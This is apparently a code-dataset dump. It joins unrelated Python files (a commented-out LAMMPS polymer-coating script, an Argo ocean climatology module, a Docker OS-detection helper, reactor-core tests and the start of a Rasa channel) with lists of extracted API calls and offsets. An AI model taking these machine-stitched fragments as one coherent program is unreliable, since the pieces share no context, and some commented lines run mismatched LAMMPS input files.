# Dir_seed = read_data("ghost_grain.data")
# center = Get_Center_of_Mass(Dir_seed)
# D, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# radius = math.ceil(D) + 5
# print("Grain Radius:", D) #'Coordinates cylinder: ', coord,
# GD = D
# nc = calc_polymer(mass, nm, polymer_type, p_fra, custom=mw)
# Get new cell for polymod
# Run polymod
# shift, cell_polymod, cpos, caxis, clength = parameters(
# periodic, cell_sizes, coord, boundaries, radius
# )
# input_polymod(nc, nm, cell_polymod, cpos, caxis, radius, clength, mctemp)
# p_flag = 1
# while p_flag:
# print("Running PolymerModeler, generate initial configuration of polymers")
# run_polymod()
# shutil.copy("atoms.dat", "./str2lammps/types")
# shutil.copy("bonds.dat", "./str2lammps/types")
# p = polymer_type.split("-")[0]
# shutil.copy(
# "./str2lammps/types/%s_atom_type.dat" % p,
# "./str2lammps/types/atom_type.dat",
# )
# shutil.copy("./str2lammps/types/%s_atom_type.dat" % p, "%s_atom_type.dat" % p)
# shutil.copy("bond_type.dat", "./str2lammps/types")
# addatomtype("%s_atom_type.dat" % p, "atom_type.dat", elementlist)
# Str2Lammps
# os.chdir("./str2lammps/")
# print os.getcwd()
# new_typing, data4lammps = run_data4lammps("Gasteiger", "Dreiding", cell_polymod)
# subprocess.Popen(new_typing, shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# print(data4lammps)
# print("Generating initial polymer datafile")
# os.system(data4lammps)
# return_code = subprocess.Popen(data4lammps, shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.chdir("../unwrap/")
# print("Unwrap polymers")
# os.system("../lmp_mpi < uw.in")
# return_code = subprocess.Popen('../lmp_mpi < uw.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# dump2data("expanded.data", "unwrap.dump", "step0.data")
# os.chdir("..")
# os.system("cp unwrap/step0.data .")
# os.system("cp unwrap/unwrap.dump .")
# Dir_dump = read_dump("unwrap.dump")
# na = 0
# for t in Dir_dump:
# na = Dir_dump[t]["NUMBER OF ATOMS"]
# break
# write_minimize(
# "minimize.in",
# "str2lammps/X6paircoeffs.txt",
# "str2lammps/types/%s_atom_type.dat" % p,
# )
# if rnp_flag:
# print("Calculating recommended number of processors")
# ppn = grabprocessors("minimize.in")
# print(ppn)
# nodes, ppn, np = correctppn(ppn)
# print("%d of processors will be in use" % np)
# print("Running LAMMPS, minimize the intial configuration")
# if np_flag:
# os.system("mpiexec -np %d ./lmp_mpi < minimize.in" % np)
# else:
# os.system("./lmp_mpi < minimize.in")
# return_code = subprocess.Popen('./lmp_mpi < minimize.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.minimize")
# print("Runing 10 steps for coating")
# center = [cpos[0], cpos[1], 0]
# for i in range(10):
# print("Step %d" % (i + 1))
# input_coat4(
# na, cpos, "step%d.data" % (i * 3 + 1), "step%d.data" % (i * 3 + 2)
# )
# print("Running LAMMPS, assign velocities")
# os.system("./lmp_mpi < run_coat4.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat4.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat4_%d" % i)
# Dir_seed = read_data("step%d.data" % (i * 3 + 2))
# oradius, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# print("Current outter radius:", oradius)
# Dir = read_data("step%d.data" % (i * 3 + 2))
# if "Pair Coeffs" in Dir:
# del Dir["Pair Coeffs"]
# write_data(Dir, "step%d.data" % (i * 3 + 3))
# input_coat5(
# cpos,
# radius - 5,
# oradius,
# "step%d.data" % (i * 3 + 3),
# "step%d.data" % (i * 3 + 4),
# i * 5000,
# "str2lammps/X6paircoeffs.txt",
# mctemp,
# )
# print("Running LAMMPS, coat polymers")
# if np_flag:
# os.system("mpiexec -np %d ./lmp_mpi < run_coat5.in" % np)
# else:
# os.system("./lmp_mpi < run_coat5.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat5.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat5_%d" % i)
# if not os.path.exists("step%d.data" % (i * 3 + 4)):
# break
# if os.path.exists("step31.data"):
# os.system("mv step31.data ../polymer.data")
# p_flag = 0
# else:
# print("Failed. Generating another configuration")
# print("Polymer datafile polymer.data is ready, now combining with grain datafile")
# Dir_polymer = read_data("../polymer.data")
# vector = [-cpos[0], -cpos[1], 0]
# Dir_polymer = data_Translation(Dir_polymer, vector, box=1)
# vector = [-coord["x"], -coord["y"], 0]
# Dir_RDX = data_Translation(Dir_RDX, vector)
# Dir_data = add_data(Dir_polymer, Dir_RDX)
# write_data(Dir_data, "../initial_polymer_grain.data", v=0)
# print("Initial combined datafile initial_polymer_grain.data is ready to use")
# print("Center Coordinates: x, ", 0, "y, ", 0)
# print("Calculating initial polymer thickness")
# Dir_seed = read_data("../initial_polymer_grain.data")
# center = [0, 0, 0]
# D, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# PT = D - GD
# print("Initial polymer thickness:", PT)
# des=open('p_thickness.dat','w')
# des.write(str(PT))
# des.close()
# shutil.copy("atom_type.dat", "./str2lammps/types")
# os.chdir("./str2lammps/")
# new_typing, data4lammps = run_data4lammps("Gasteiger", "Dreiding", cell_polymod)
# print("Generating new potentialfile")
# os.system(data4lammps)
# os.chdir("..")
# shutil.copy("./str2lammps/X6paircoeffs.txt", "X6paircoeffs.txt")
# shiftpotential("X6paircoeffs.txt", "../potential.mod", "potential.mod", Dir_polymer)
# print("Runing 10 steps for coating with grain")
# center = [0, 0, 0]
# input_coat6(na, "../initial_polymer_grain.data", "step32.data")
# if rnp_flag:
# print("Calculating recommended number of processors")
# ppn = grabprocessors("run_coat6.in")
# print(ppn)
# nodes, ppn, np = correctppn(ppn)
# print("%d of processors will be in use" % np)
# for i in range(10):
# print("Step %d" % (i + 1))
# if i:
# input_coat6(na, "step%d.data" % (i * 3 + 31), "step%d.data" % (i * 3 + 32))
# print("Running LAMMPS, assign velocities")
# os.system("./lmp_mpi < run_coat6.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat4.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat6_%d" % i)
# Dir_seed = read_data("step%d.data" % (i * 3 + 32))
# oradius, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# print("Current outter radius:", oradius)
# input_coat7(
# oradius,
# "step%d.data" % (i * 3 + 32),
# "step%d.data" % (i * 3 + 33),
# i * 5000,
# Dir_polymer["atom types"],
# len(elementlist),
# mctemp,
# )
# print("Running LAMMPS, coat polymers")
# if np_flag:
# os.system("mpiexec -np %d ./lmp_mpi < run_coat7.in" % np)
# else:
# os.system("./lmp_mpi < run_coat7.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat5.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat7_%d" % i)
# Dir = read_data("step%d.data" % (i * 3 + 33))
# if "Pair Coeffs" in Dir:
# del Dir["Pair Coeffs"]
# if "Bond Coeffs" in Dir:
# del Dir["Bond Coeffs"]
# if "Angle Coeffs" in Dir:
# del Dir["Angle Coeffs"]
# if "Dihedral Coeffs" in Dir:
# del Dir["Dihedral Coeffs"]
# if "Improper Coeffs" in Dir:
# del Dir["Improper Coeffs"]
# write_data(Dir, "step%d.data" % (i * 3 + 34))
# os.system("mv step61.data ../%s" % output)
# print("Datafile %s is ready to use" % output)
# print("Center Coordinates: x, ", 0, "y, ", 0)
# print("Calculating initial polymer thickness")
# Dir_seed = read_data("../%s" % output)
# center = [0, 0, 0]
# D, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# PT = D - GD
# print("Polymer thickness:", PT)
# des = open("p_thickness.dat", "w")
# des.write(str(PT))
# des.close()
# return True
def zen(with_attribution=True):
quote = """Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!"""
if with_attribution:
quote += "\n\t<NAME>"
return quote
def canvas(with_attribution=True):
"""
Placeholder function to show example docstring (NumPy format)
Replace this function and doc string for your own project
Parameters
----------
with_attribution : bool, Optional, default: True
Set whether or not to display who the quote is from
Returns
-------
quote : str
Compiled string including quote and optional attribution
"""
quote = "The code is but a canvas to our imagination."
if with_attribution:
quote += "\n\t- Adapted from <NAME>"
return quote
if __name__ == "__main__":
# Do something if this file is invoked on its own
print(canvas())
infile = sys.argv[1]
# args = polymerxtal.read_input(infile)
# main(arg)
|
[
"os.path.join",
"numpy.sqrt"
] |
[((3267, 3301), 'os.path.join', 'os.path.join', (['directory', '"""main.py"""'], {}), "(directory, 'main.py')\n", (3279, 3301), False, 'import os, sys, os.path\n'), ((3315, 3357), 'os.path.join', 'os.path.join', (['directory', '"""doAtomTyping.py"""'], {}), "(directory, 'doAtomTyping.py')\n", (3327, 3357), False, 'import os, sys, os.path\n'), ((19477, 19487), 'numpy.sqrt', 'np.sqrt', (['D'], {}), '(D)\n', (19484, 19487), True, 'import numpy as np\n'), ((42059, 42091), 'numpy.sqrt', 'np.sqrt', (['(param_i[0] * param_j[0])'], {}), '(param_i[0] * param_j[0])\n', (42066, 42091), True, 'import numpy as np\n'), ((42118, 42150), 'numpy.sqrt', 'np.sqrt', (['(param_i[1] * param_j[1])'], {}), '(param_i[1] * param_j[1])\n', (42125, 42150), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import tools
import tiles
import interp
import computational as cpt
import matplotlib.pyplot as plt
import gsw
from scipy import interpolate
from scipy import integrate
import os
# plt.ion()
time_flag = 'annual' # 'DJF' # 'annual'
typestat = 'zmean'
seasons = ['DJF', 'MAM', 'JJA', 'SON']
var_stats = ["W", "CT", "SA", "CT_STD", "BVF2_STD", "RSTAR", "CF"]
attributes = {"W": ("weight (dimensionless)", "1", [0., 10000.]),
"CT": ("conservative temperature", "degC", [-3., 50.]),
"SA": ("absolute salinity", "g kg-1", [0., 50.]),
"CT_STD": ("CT standard deviation", "degC", [0., 20.]),
"BVF2_STD": ("square of Brunt Vaisala Frequency standard deviation", "s-1", [0., 1e-2]),
"RSTAR": ("compensated density", "kg m-3", [1000., 1032.]),
"CF": ("compressibility factor (dimensionless)", "1", [0.99, 1.])}
global_attributes = {
"title": "World Ocean Climatology of mean temperature, salinity and compensated density"
}
tiles_dir = "%s/%g/stats" % (tiles.tiles_dir, tiles.reso)
var_dir = {v: tiles_dir+"/%s" % v for v in var_stats}
tiles_file = "%s/stats_%s.pkl" # % (var_dir[var], tile)
zref = tools.zref
threshold = 5e-2
def create_folders():
for d in [tiles_dir]+list(var_dir.values()):
if os.path.exists(d):
pass
else:
os.makedirs(d)
def compute_avg(j, i, lonr, latr, latdeg, LONr, LATr, resor, data):
# if True:
w = cpt.compute_weight(lonr[i], latr[j], LONr, LATr, resor)
clim = pd.DataFrame(0., columns=var_stats, index=zref)
profiles_to_use = (w > threshold)
tags = profiles_to_use.index
w = w[tags]
totalweight = w.sum()
print(" weight=%2.1f" % (totalweight), end="")
if totalweight < 2:
clim[:] = np.nan
else:
CT = data["CT"].loc[tags, :]
SA = data["SA"].loc[tags, :]
BVF2 = data["BVF2"].loc[tags, :]
bad = CT.isna() | (CT < -3) | (CT > 50) | (SA < 0) | (SA > 50)
nz = len(zref)
#weight = w[:, np.newaxis]*np.ones((nz,))
weight = CT.copy()
weight.iloc[:, :] = w[:, np.newaxis]
weight[bad] = 0.
CT[bad] = 0.
SA[bad] = 0.
W = np.sum(weight, axis=0)
clim.W[:] = W
z0 = np.sum(CT * weight, axis=0)
z2 = np.sum(CT*CT * weight, axis=0)
clim.CT[:] = z0/W
sigma = np.sqrt((z2-z0*z0/W)/(W-1))
clim.CT_STD[:] = sigma
z0 = np.sum(SA * weight, axis=0)
clim.SA[:] = z0/W
z0 = np.sum(BVF2 * weight, axis=0)
z2 = np.sum(BVF2*BVF2 * weight, axis=0)
sigma = np.sqrt((z2-z0*z0/W)/(W-1))
clim.BVF2_STD[:] = sigma
if True:
rhostar, compf = comp_rhostar(clim.SA, clim.CT, latdeg)
clim.RSTAR[:] = rhostar
clim.CF[:] = compf
clim[clim == 0.] = np.nan
return clim, tags
def comp_rhostar(Si, Ti, lat):
pi = gsw.p_from_z(-zref, lat)
cs = gsw.sound_speed(Si, Ti, pi)
Ri = gsw.rho(Si, Ti, pi)
g = gsw.grav(lat, pi[0])
E = np.zeros((len(zref),))
#plt.plot(Ri, -zref)
f = interpolate.interp1d(zref, cs)
def e(x): return -g/f(x)**2
if True:
for k, z in enumerate(zref):
if k == 0:
r, E[k] = 0., 1.
else:
#r1,p = integrate.quad(e,zref[k-1],z,epsrel=1e-1)
x = np.linspace(zref[k-1], z, 10)
dx = x[1]-x[0]
r1 = integrate.trapz(e(x), dx=dx)
r += r1
E[k] = np.exp(r)
return Ri*E, E
def get_grid_on_box(b):
reso = tiles.reso
lonmin = np.ceil(b["LONMIN"]/reso)*reso
lonmax = np.floor(b["LONMAX"]/reso)*reso
latmin = np.ceil(b["LATMIN"]/reso)*reso
latmax = np.floor(b["LATMAX"]/reso)*reso
latmin = max(latmin, -80) # TODO: replace with min(latglo)
latmax = min(latmax, 80) # TODO
lon = np.arange(lonmin, lonmax+reso, reso)
lat = np.arange(latmin, latmax+reso, reso)
return lat, lon
def compute_stats(bb, tile):
# read more than just one tile => to cope with the halo
tile_list, rect = tiles.tiles_with_halo(bb, tile)
argo = tiles.read_argo_tile(tile_list)
data = interp.read_profiles(tile_list)
#argo = tiles.extract_in_tile(argo, rect)
argo = argo[argo.STATUS == "D"]
for var in data.keys():
data[var] = data[var].loc[argo.index, :]
reso = tiles.reso
zref = tools.zref
CT = data['CT']
SA = data['SA']
# patch TO REMOVE LATER
CT.iloc[:, 1] = 0.5*(CT.iloc[:, 0]+CT.iloc[:, 2])
SA.iloc[:, 1] = 0.5*(SA.iloc[:, 0]+SA.iloc[:, 2])
LON = argo['LONGITUDE']
LAT = argo['LATITUDE']
lat, lon = get_grid_on_box(bb[tile])
LONr = np.deg2rad(LON)
LATr = np.deg2rad(LAT)
lonr = np.deg2rad(lon)
latr = np.deg2rad(lat)
resor = np.deg2rad(reso)
nlon, nlat, nz = len(lon), len(lat), len(zref)
CTbar = np.zeros((nlat, nlon, nz))
SAbar = np.zeros((nlat, nlon, nz))
CTstd = np.zeros((nlat, nlon, nz))
BVF2std = np.zeros((nlat, nlon, nz))
RHOSTAR = np.zeros((nlat, nlon, nz))
CF = np.zeros((nlat, nlon, nz))
W = np.zeros((nlat, nlon, nz))
monitor_file = "monitor_%s.txt" % tile
with open(monitor_file, "w") as fid:
fid.write("MEANSTATE / #profiles: %i / nlat x nlon: %i" % (len(argo), nlat*nlon))
#fig = plt.figure()
for j in range(nlat):
for i in range(nlon):
print("\r j=%2i/%i-%2i/%i" % (j, nlat, i, nlon), end="")
clim, tags = compute_avg(
j, i, lonr, latr, lat[j], LONr, LATr, resor, data)
CTbar[j, i, :] = clim["CT"]
SAbar[j, i, :] = clim["SA"]
CTstd[j, i, :] = clim["CT_STD"]
BVF2std[j, i, :] = clim["BVF2_STD"]
RHOSTAR[j, i, :] = clim["RSTAR"]
CF[j, i, :] = clim["CF"]
W[j, i, :] = clim["W"]
# fig.canvas.draw()
mapvar = {"CT": CTbar, "SA": SAbar, "CT_STD": CTstd,
"BVF2_STD": BVF2std,
"RSTAR": RHOSTAR, "CF": CF, "W": W}
print()
for var in var_stats:
v = mapvar[var]
d = var_dir[var]
f = tiles_file % (d, tile)
print("write %s" % f)
pd.to_pickle(v, f)
os.system("rm %s" % monitor_file)
def read(tile, var, transpose=True):
d = var_dir[var]
f = tiles_file % (d, tile)
print(f)
if os.path.exists(f):
data = pd.read_pickle(f)
if transpose:
data = np.transpose(data, (2, 0, 1))
else:
data = None
return data
|
[
"numpy.sum",
"numpy.floor",
"numpy.arange",
"numpy.exp",
"pandas.to_pickle",
"scipy.interpolate.interp1d",
"gsw.p_from_z",
"pandas.DataFrame",
"os.path.exists",
"numpy.transpose",
"tiles.tiles_with_halo",
"numpy.linspace",
"gsw.rho",
"computational.compute_weight",
"numpy.ceil",
"os.system",
"interp.read_profiles",
"gsw.grav",
"os.makedirs",
"numpy.deg2rad",
"numpy.zeros",
"tiles.read_argo_tile",
"gsw.sound_speed",
"pandas.read_pickle",
"numpy.sqrt"
] |
[((1512, 1567), 'computational.compute_weight', 'cpt.compute_weight', (['lonr[i]', 'latr[j]', 'LONr', 'LATr', 'resor'], {}), '(lonr[i], latr[j], LONr, LATr, resor)\n', (1530, 1567), True, 'import computational as cpt\n'), ((1579, 1627), 'pandas.DataFrame', 'pd.DataFrame', (['(0.0)'], {'columns': 'var_stats', 'index': 'zref'}), '(0.0, columns=var_stats, index=zref)\n', (1591, 1627), True, 'import pandas as pd\n'), ((2995, 3019), 'gsw.p_from_z', 'gsw.p_from_z', (['(-zref)', 'lat'], {}), '(-zref, lat)\n', (3007, 3019), False, 'import gsw\n'), ((3029, 3056), 'gsw.sound_speed', 'gsw.sound_speed', (['Si', 'Ti', 'pi'], {}), '(Si, Ti, pi)\n', (3044, 3056), False, 'import gsw\n'), ((3067, 3086), 'gsw.rho', 'gsw.rho', (['Si', 'Ti', 'pi'], {}), '(Si, Ti, pi)\n', (3074, 3086), False, 'import gsw\n'), ((3095, 3115), 'gsw.grav', 'gsw.grav', (['lat', 'pi[0]'], {}), '(lat, pi[0])\n', (3103, 3115), False, 'import gsw\n'), ((3180, 3210), 'scipy.interpolate.interp1d', 'interpolate.interp1d', (['zref', 'cs'], {}), '(zref, cs)\n', (3200, 3210), False, 'from scipy import interpolate\n'), ((3977, 4015), 'numpy.arange', 'np.arange', (['lonmin', '(lonmax + reso)', 'reso'], {}), '(lonmin, lonmax + reso, reso)\n', (3986, 4015), True, 'import numpy as np\n'), ((4024, 4062), 'numpy.arange', 'np.arange', (['latmin', '(latmax + reso)', 'reso'], {}), '(latmin, latmax + reso, reso)\n', (4033, 4062), True, 'import numpy as np\n'), ((4195, 4226), 'tiles.tiles_with_halo', 'tiles.tiles_with_halo', (['bb', 'tile'], {}), '(bb, tile)\n', (4216, 4226), False, 'import tiles\n'), ((4239, 4270), 'tiles.read_argo_tile', 'tiles.read_argo_tile', (['tile_list'], {}), '(tile_list)\n', (4259, 4270), False, 'import tiles\n'), ((4282, 4313), 'interp.read_profiles', 'interp.read_profiles', (['tile_list'], {}), '(tile_list)\n', (4302, 4313), False, 'import interp\n'), ((4807, 4822), 'numpy.deg2rad', 'np.deg2rad', (['LON'], {}), '(LON)\n', (4817, 4822), True, 'import numpy as np\n'), ((4834, 4849), 'numpy.deg2rad', 'np.deg2rad', (['LAT'], {}), '(LAT)\n', (4844, 4849), True, 'import numpy as np\n'), ((4861, 4876), 'numpy.deg2rad', 'np.deg2rad', (['lon'], {}), '(lon)\n', (4871, 4876), True, 'import numpy as np\n'), ((4888, 4903), 'numpy.deg2rad', 'np.deg2rad', (['lat'], {}), '(lat)\n', (4898, 4903), True, 'import numpy as np\n'), ((4916, 4932), 'numpy.deg2rad', 'np.deg2rad', (['reso'], {}), '(reso)\n', (4926, 4932), True, 'import numpy as np\n'), ((4998, 5024), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5006, 5024), True, 'import numpy as np\n'), ((5037, 5063), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5045, 5063), True, 'import numpy as np\n'), ((5076, 5102), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5084, 5102), True, 'import numpy as np\n'), ((5117, 5143), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5125, 5143), True, 'import numpy as np\n'), ((5158, 5184), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5166, 5184), True, 'import numpy as np\n'), ((5194, 5220), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5202, 5220), True, 'import numpy as np\n'), ((5229, 5255), 'numpy.zeros', 'np.zeros', (['(nlat, nlon, nz)'], {}), '((nlat, nlon, nz))\n', (5237, 5255), True, 'import numpy as np\n'), ((6343, 6376), 'os.system', 'os.system', (["('rm %s' % monitor_file)"], {}), "('rm %s' % monitor_file)\n", (6352, 6376), False, 'import os\n'), ((6488, 6505), 'os.path.exists', 'os.path.exists', (['f'], {}), '(f)\n', (6502, 6505), False, 'import os\n'), ((1339, 1356), 'os.path.exists', 'os.path.exists', (['d'], {}), '(d)\n', (1353, 1356), False, 'import os\n'), ((2265, 2287), 'numpy.sum', 'np.sum', (['weight'], {'axis': '(0)'}), '(weight, axis=0)\n', (2271, 2287), True, 'import numpy as np\n'), ((2323, 2350), 'numpy.sum', 'np.sum', (['(CT * weight)'], {'axis': '(0)'}), '(CT * weight, axis=0)\n', (2329, 2350), True, 'import numpy as np\n'), ((2364, 2396), 'numpy.sum', 'np.sum', (['(CT * CT * weight)'], {'axis': '(0)'}), '(CT * CT * weight, axis=0)\n', (2370, 2396), True, 'import numpy as np\n'), ((2438, 2475), 'numpy.sqrt', 'np.sqrt', (['((z2 - z0 * z0 / W) / (W - 1))'], {}), '((z2 - z0 * z0 / W) / (W - 1))\n', (2445, 2475), True, 'import numpy as np\n'), ((2511, 2538), 'numpy.sum', 'np.sum', (['(SA * weight)'], {'axis': '(0)'}), '(SA * weight, axis=0)\n', (2517, 2538), True, 'import numpy as np\n'), ((2579, 2608), 'numpy.sum', 'np.sum', (['(BVF2 * weight)'], {'axis': '(0)'}), '(BVF2 * weight, axis=0)\n', (2585, 2608), True, 'import numpy as np\n'), ((2622, 2658), 'numpy.sum', 'np.sum', (['(BVF2 * BVF2 * weight)'], {'axis': '(0)'}), '(BVF2 * BVF2 * weight, axis=0)\n', (2628, 2658), True, 'import numpy as np\n'), ((2673, 2710), 'numpy.sqrt', 'np.sqrt', (['((z2 - z0 * z0 / W) / (W - 1))'], {}), '((z2 - z0 * z0 / W) / (W - 1))\n', (2680, 2710), True, 'import numpy as np\n'), ((3701, 3728), 'numpy.ceil', 'np.ceil', (["(b['LONMIN'] / reso)"], {}), "(b['LONMIN'] / reso)\n", (3708, 3728), True, 'import numpy as np\n'), ((3745, 3773), 'numpy.floor', 'np.floor', (["(b['LONMAX'] / reso)"], {}), "(b['LONMAX'] / reso)\n", (3753, 3773), True, 'import numpy as np\n'), ((3790, 3817), 'numpy.ceil', 'np.ceil', (["(b['LATMIN'] / reso)"], {}), "(b['LATMIN'] / reso)\n", (3797, 3817), True, 'import numpy as np\n'), ((3834, 3862), 'numpy.floor', 'np.floor', (["(b['LATMAX'] / reso)"], {}), "(b['LATMAX'] / reso)\n", (3842, 3862), True, 'import numpy as np\n'), ((6319, 6337), 'pandas.to_pickle', 'pd.to_pickle', (['v', 'f'], {}), '(v, f)\n', (6331, 6337), True, 'import pandas as pd\n'), ((6522, 6539), 'pandas.read_pickle', 'pd.read_pickle', (['f'], {}), '(f)\n', (6536, 6539), True, 'import pandas as pd\n'), ((1401, 1415), 'os.makedirs', 'os.makedirs', (['d'], {}), '(d)\n', (1412, 1415), False, 'import os\n'), ((6581, 6610), 'numpy.transpose', 'np.transpose', (['data', '(2, 0, 1)'], {}), '(data, (2, 0, 1))\n', (6593, 6610), True, 'import numpy as np\n'), ((3453, 3484), 'numpy.linspace', 'np.linspace', (['zref[k - 1]', 'z', '(10)'], {}), '(zref[k - 1], z, 10)\n', (3464, 3484), True, 'import numpy as np\n'), ((3611, 3620), 'numpy.exp', 'np.exp', (['r'], {}), '(r)\n', (3617, 3620), True, 'import numpy as np\n')]
|
# Copyright 2019 Open Source Robotics Foundation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pexpect
from ast import literal_eval
from io import BytesIO as StringIO
from .core import get_docker_client
DETECTOR_DOCKERFILE="""
FROM python:3
RUN mkdir -p /tmp/distrovenv
RUN python3 -m venv /tmp/distrovenv
RUN . /tmp/distrovenv/bin/activate && pip install distro pyinstaller staticx
RUN apt-get update && apt-get install patchelf #needed for staticx
RUN echo 'import distro; print(distro.linux_distribution())' > /tmp/distrovenv/detect_os.py
RUN . /tmp/distrovenv/bin/activate && pyinstaller --onefile /tmp/distrovenv/detect_os.py
RUN . /tmp/distrovenv/bin/activate && staticx /dist/detect_os /dist/detect_os_static
"""
DETECTION_TEMPLATE="""
FROM rocker__detector as detector
FROM %(image_name)s
COPY --from=detector /dist/detect_os_static /tmp/detect_os
ENTRYPOINT [ "/tmp/detect_os" ]
CMD [ "" ]
"""
def build_detector_image(verbose=False):
client = get_docker_client()
"""Build the image to use to detect the OS"""
dockerfile_tag = 'rocker__detector'
iof = StringIO(DETECTOR_DOCKERFILE.encode())
im = client.build(fileobj = iof, tag=dockerfile_tag)
log = []
for l in im:
log.append(l.decode())
success = False
# Check for success. sometimes it's the last sometimes it tags last.
for l in log[-2:-1]:
if "Successfully built " in l:
success = True
if not success:
print("Failed to build image %s:\n>>>>\n%s\n>>>>>" % (dockerfile_tag, '\n'.join(log)))
elif verbose:
print("Successfully built image %s:\n>>>>\n%s\n>>>>>" % (dockerfile_tag, '\n'.join(log)))
return success
def detect_os(image_name):
client = get_docker_client()
dockerfile_tag = 'rocker__detection_%s' % image_name
iof = StringIO((DETECTION_TEMPLATE % locals()).encode())
im = client.build(fileobj = iof, tag=dockerfile_tag)
for l in im:
pass
#print(l)
cmd="docker run -it --rm %s" % dockerfile_tag
p = pexpect.spawn(cmd)
output = p.read()
p.terminate()
if p.exitstatus == 0:
return literal_eval(output.decode().strip())
else:
return None
|
[
"pexpect.spawn"
] |
[((2536, 2554), 'pexpect.spawn', 'pexpect.spawn', (['cmd'], {}), '(cmd)\n', (2549, 2554), False, 'import pexpect\n')]
|
import fridge.Core.Core as Core
import fridge.driver.global_variables as gb
global_vars = gb.GlobalVariables()
global_vars.read_input_file('Full_Core_Test')
def test_baseCore():
core = Core.Core()
assert core.name == ''
assert core.assemblyList == []
assert core.coreCoolant is None
assert core.reactorVessel is None
assert core.vesselThickness == 0
assert core.coolantSurfaceCard == ''
assert core.coolantCellCard == ''
assert core.materialCard == ''
assert core.vesselMaterial is None
assert core.vesselMaterialString == ''
assert core.coolantRadius == 0
assert core.coolantHeight == 0
assert core.coolantPosition == []
assert core.coolantMaterial is None
assert core.vesselRadius == 0
assert core.vesselPosition == []
assert core.vesselSurfaceCard == ''
assert core.coreCellList == []
assert core.coreSurfaceList == []
assert core.coreMaterialList == []
assert core.everythingElse is None
def test_getCoreData():
core = Core.Core()
core.read_core_data('Core_Test')
assert core.name == 'Test_Core'
assert core.vesselThickness == 10
assert core.vesselMaterialString == 'HT9'
global_vars = gb.GlobalVariables()
global_vars.read_input_file('Full_Core_Test', output_name='test', temperature=1200, void_per=0.001)
def test_perturbedCoreData():
core = Core.Core()
core.read_core_data('Core_Test')
assert global_vars.output_name == 'test'
assert global_vars.temperature == 1200
assert global_vars.void_per == 0.001
|
[
"fridge.Core.Core.Core",
"fridge.driver.global_variables.GlobalVariables"
] |
[((91, 111), 'fridge.driver.global_variables.GlobalVariables', 'gb.GlobalVariables', ([], {}), '()\n', (109, 111), True, 'import fridge.driver.global_variables as gb\n'), ((1205, 1225), 'fridge.driver.global_variables.GlobalVariables', 'gb.GlobalVariables', ([], {}), '()\n', (1223, 1225), True, 'import fridge.driver.global_variables as gb\n'), ((192, 203), 'fridge.Core.Core.Core', 'Core.Core', ([], {}), '()\n', (201, 203), True, 'import fridge.Core.Core as Core\n'), ((1020, 1031), 'fridge.Core.Core.Core', 'Core.Core', ([], {}), '()\n', (1029, 1031), True, 'import fridge.Core.Core as Core\n'), ((1369, 1380), 'fridge.Core.Core.Core', 'Core.Core', ([], {}), '()\n', (1378, 1380), True, 'import fridge.Core.Core as Core\n')]
|
import logging
import uuid
from typing import Optional, Text, Any, List, Dict, Iterable
from sanic import Blueprint, response
from sanic.request import Request
from rasa.core.channels.channel import InputChannel, UserMessage, OutputChannel
from socketio import AsyncServer
from apis.languagetool_api import LanguageTool
from apis.nlu_api import NLUApi
logger = logging.getLogger(__name__)
class RasaAppBlueprint(Blueprint):
"""
Rasa Socket.io channel for socket connection with client
Create sanic blueprint to attach to sanic server
"""
